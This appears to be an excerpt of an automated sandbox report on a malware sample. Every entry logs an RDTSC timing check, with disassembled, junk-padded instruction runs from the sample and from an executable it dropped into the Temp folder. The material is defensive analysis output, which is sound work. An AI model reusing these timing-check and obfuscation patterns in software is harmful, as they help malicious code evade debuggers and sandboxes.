Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546055D second address: 5460618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F4124F3C6ADh 0x0000000e jmp 00007F40B477E78Ah 0x00000013 js 00007F40B477E7F4h 0x00000019 pushad 0x0000001a mov di, si 0x0000001d mov di, ax 0x00000020 popad 0x00000021 cmp dword ptr [ebp-14h], edi 0x00000024 pushad 0x00000025 call 00007F40B477E792h 0x0000002a mov esi, 0EB59D31h 0x0000002f pop ecx 0x00000030 pushfd 0x00000031 jmp 00007F40B477E797h 0x00000036 sbb cl, FFFFFF9Eh 0x00000039 jmp 00007F40B477E799h 0x0000003e popfd 0x0000003f popad 0x00000040 jne 00007F4124F3C64Ch 0x00000046 jmp 00007F40B477E78Eh 0x0000004b mov ebx, dword ptr [ebp+08h] 0x0000004e jmp 00007F40B477E790h 0x00000053 lea eax, dword ptr [ebp-2Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F40B477E797h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460618 second address: 5460645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FBFDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460645 second address: 546064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546064B second address: 546064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546064F second address: 5460653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460653 second address: 5460661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460661 second address: 546068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F40B477E791h 0x0000000a or ax, 45A6h 0x0000000f jmp 00007F40B477E791h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546068F second address: 5460695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460695 second address: 5460723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushfd 0x00000011 jmp 00007F40B477E791h 0x00000016 and al, 00000066h 0x00000019 jmp 00007F40B477E791h 0x0000001e popfd 0x0000001f popad 0x00000020 nop 0x00000021 jmp 00007F40B477E78Eh 0x00000026 push eax 0x00000027 jmp 00007F40B477E78Bh 0x0000002c nop 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F40B477E794h 0x00000034 xor eax, 7190AA68h 0x0000003a jmp 00007F40B477E78Bh 0x0000003f popfd 0x00000040 push eax 0x00000041 push edx 0x00000042 mov bl, ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460723 second address: 5460742 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 mov bx, C6BAh 0x0000000d popad 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F40B515FBFCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450EE0 second address: 5450EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450EE6 second address: 5450F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F40B515FC00h 0x00000009 xor eax, 697C23A8h 0x0000000f jmp 00007F40B515FBFBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450F0E second address: 5450F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp-04h], 55534552h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F40B477E790h 0x00000017 sbb si, 9608h 0x0000001c jmp 00007F40B477E78Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450F8C second address: 5450FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450FA4 second address: 5460B8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 lea esp, dword ptr [ebp-0Ch] 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b jmp dword ptr [003CA41Ch+ebx*4] 0x00000022 push edi 0x00000023 call 00007F40B47A4187h 0x00000028 push ebp 0x00000029 push ebx 0x0000002a push edi 0x0000002b push esi 0x0000002c sub esp, 000001D0h 0x00000032 mov dword ptr [esp+000001B4h], 003CCB10h 0x0000003d mov dword ptr [esp+000001B0h], 000000D0h 0x00000048 mov dword ptr [esp], 00000000h 0x0000004f mov eax, dword ptr [003C81DCh] 0x00000054 call eax 0x00000056 mov edi, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460B8A second address: 5460B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460B8E second address: 5460BA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E792h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460BA4 second address: 5460BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F40B515FC06h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F40B515FBFEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460BDB second address: 5460C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 28CC28B4h 0x00000008 jmp 00007F40B477E78Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 call 00007F40B477E799h 0x0000001a pushfd 0x0000001b jmp 00007F40B477E790h 0x00000020 adc esi, 6496C8C8h 0x00000026 jmp 00007F40B477E78Bh 0x0000002b popfd 0x0000002c pop eax 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F40B477E792h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C4C second address: 5460C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C52 second address: 5460C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C56 second address: 5460C9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75C7459Ch], 05h 0x0000000f jmp 00007F40B515FC09h 0x00000014 je 00007F412590D977h 0x0000001a pushad 0x0000001b movzx esi, di 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F40B515FC01h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C9D second address: 5460CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460CA3 second address: 5460CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460CA7 second address: 5460CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460E07 second address: 5460E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548068C second address: 5480690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480690 second address: 5480696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480696 second address: 54806EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 3121h 0x00000007 pushfd 0x00000008 jmp 00007F40B477E78Eh 0x0000000d xor eax, 227FAEB8h 0x00000013 jmp 00007F40B477E78Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007F40B477E799h 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 call 00007F40B477E78Ah 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54806EA second address: 5480781 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 479D8C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, 6292h 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bl, B1h 0x00000013 pushfd 0x00000014 jmp 00007F40B515FC00h 0x00000019 adc al, FFFFFFA8h 0x0000001c jmp 00007F40B515FBFBh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 pushad 0x00000026 mov ax, C531h 0x0000002a pushfd 0x0000002b jmp 00007F40B515FBFEh 0x00000030 sub esi, 2D1FFD08h 0x00000036 jmp 00007F40B515FBFBh 0x0000003b popfd 0x0000003c popad 0x0000003d jmp 00007F40B515FC08h 0x00000042 popad 0x00000043 push eax 0x00000044 jmp 00007F40B515FBFBh 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F40B515FC00h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480781 second address: 5480785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480785 second address: 548078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548078B second address: 54807DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f pushfd 0x00000010 jmp 00007F40B477E78Ah 0x00000015 or ecx, 6915F428h 0x0000001b jmp 00007F40B477E78Bh 0x00000020 popfd 0x00000021 popad 0x00000022 test esi, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F40B477E795h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54807DA second address: 5480812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F41258ED7BEh 0x0000000f jmp 00007F40B515FBFEh 0x00000014 cmp dword ptr [75C7459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, dl 0x00000020 push esi 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480812 second address: 548086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4124F243FCh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F40B477E794h 0x00000016 add si, E678h 0x0000001b jmp 00007F40B477E78Bh 0x00000020 popfd 0x00000021 mov ah, C9h 0x00000023 popad 0x00000024 push edx 0x00000025 pushad 0x00000026 mov eax, 0CFAA7FDh 0x0000002b push eax 0x0000002c movsx ebx, si 0x0000002f pop ecx 0x00000030 popad 0x00000031 mov dword ptr [esp], esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F40B477E78Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548086F second address: 5480881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FBFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54808BB second address: 54808BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54808BF second address: 54808C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54808C5 second address: 54808E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E798h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54808E1 second address: 54808F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FBFAh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126E7B second address: 1126EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Ch 0x00000009 jmp 00007F40B477E798h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EA5 second address: 1126EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EAA second address: 1126EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EB0 second address: 1126EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EB6 second address: 1126EE0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B477E786h 0x00000008 jnc 00007F40B477E786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F40B477E78Ch 0x0000001a jp 00007F40B477E786h 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007F40B477E786h 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EE0 second address: 1126EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EE6 second address: 1126F01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F40B477E78Dh 0x0000000d jno 00007F40B477E786h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126F01 second address: 1126F0B instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B515FBF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120E68 second address: 1120E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E799h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F40B477E786h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120E90 second address: 1120E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120E94 second address: 1120EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jo 00007F40B477E786h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120EAB second address: 1120EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC05h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120EC8 second address: 1120EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F40B477E786h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120EDB second address: 1120EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E38 second address: 1125E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E796h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E53 second address: 1125E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E58 second address: 1125E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E64 second address: 1125E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E6A second address: 1125E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126143 second address: 1126159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jne 00007F40B515FC1Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F40B515FBF6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11262DC second address: 11262E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11262E1 second address: 11262E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126585 second address: 1126589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126589 second address: 112659E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F40B515FBFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 112659E second address: 11265AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F40B477E786h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126735 second address: 1126739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126739 second address: 1126751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnc 00007F40B477E786h 0x00000011 jnl 00007F40B477E786h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126751 second address: 1126756 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126756 second address: 112676D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Ah 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F40B477E786h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128D97 second address: 1128DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128DA0 second address: FAEA3C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jng 00007F40B477E792h 0x00000011 pop eax 0x00000012 jmp 00007F40B477E792h 0x00000017 push dword ptr [ebp+122D12C9h] 0x0000001d call 00007F40B477E78Dh 0x00000022 jmp 00007F40B477E78Ah 0x00000027 pop edx 0x00000028 call dword ptr [ebp+122D17FBh] 0x0000002e pushad 0x0000002f sub dword ptr [ebp+122D1A10h], ebx 0x00000035 xor eax, eax 0x00000037 jmp 00007F40B477E794h 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 mov dword ptr [ebp+122D1A10h], edx 0x00000046 mov dword ptr [ebp+122D27F2h], eax 0x0000004c jmp 00007F40B477E797h 0x00000051 mov esi, 0000003Ch 0x00000056 pushad 0x00000057 mov dword ptr [ebp+122D1886h], esi 0x0000005d xor dword ptr [ebp+122D1886h], ecx 0x00000063 popad 0x00000064 clc 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jmp 00007F40B477E78Eh 0x0000006e lodsw 0x00000070 jmp 00007F40B477E791h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 sub dword ptr [ebp+122D1A10h], ebx 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 jnp 00007F40B477E79Fh 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c js 00007F40B477E78Ch 0x00000092 jl 00007F40B477E786h 0x00000098 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128EDF second address: 1128EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128EE3 second address: 1128EED instructions: 0x00000000 rdtsc 0x00000002 jg 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
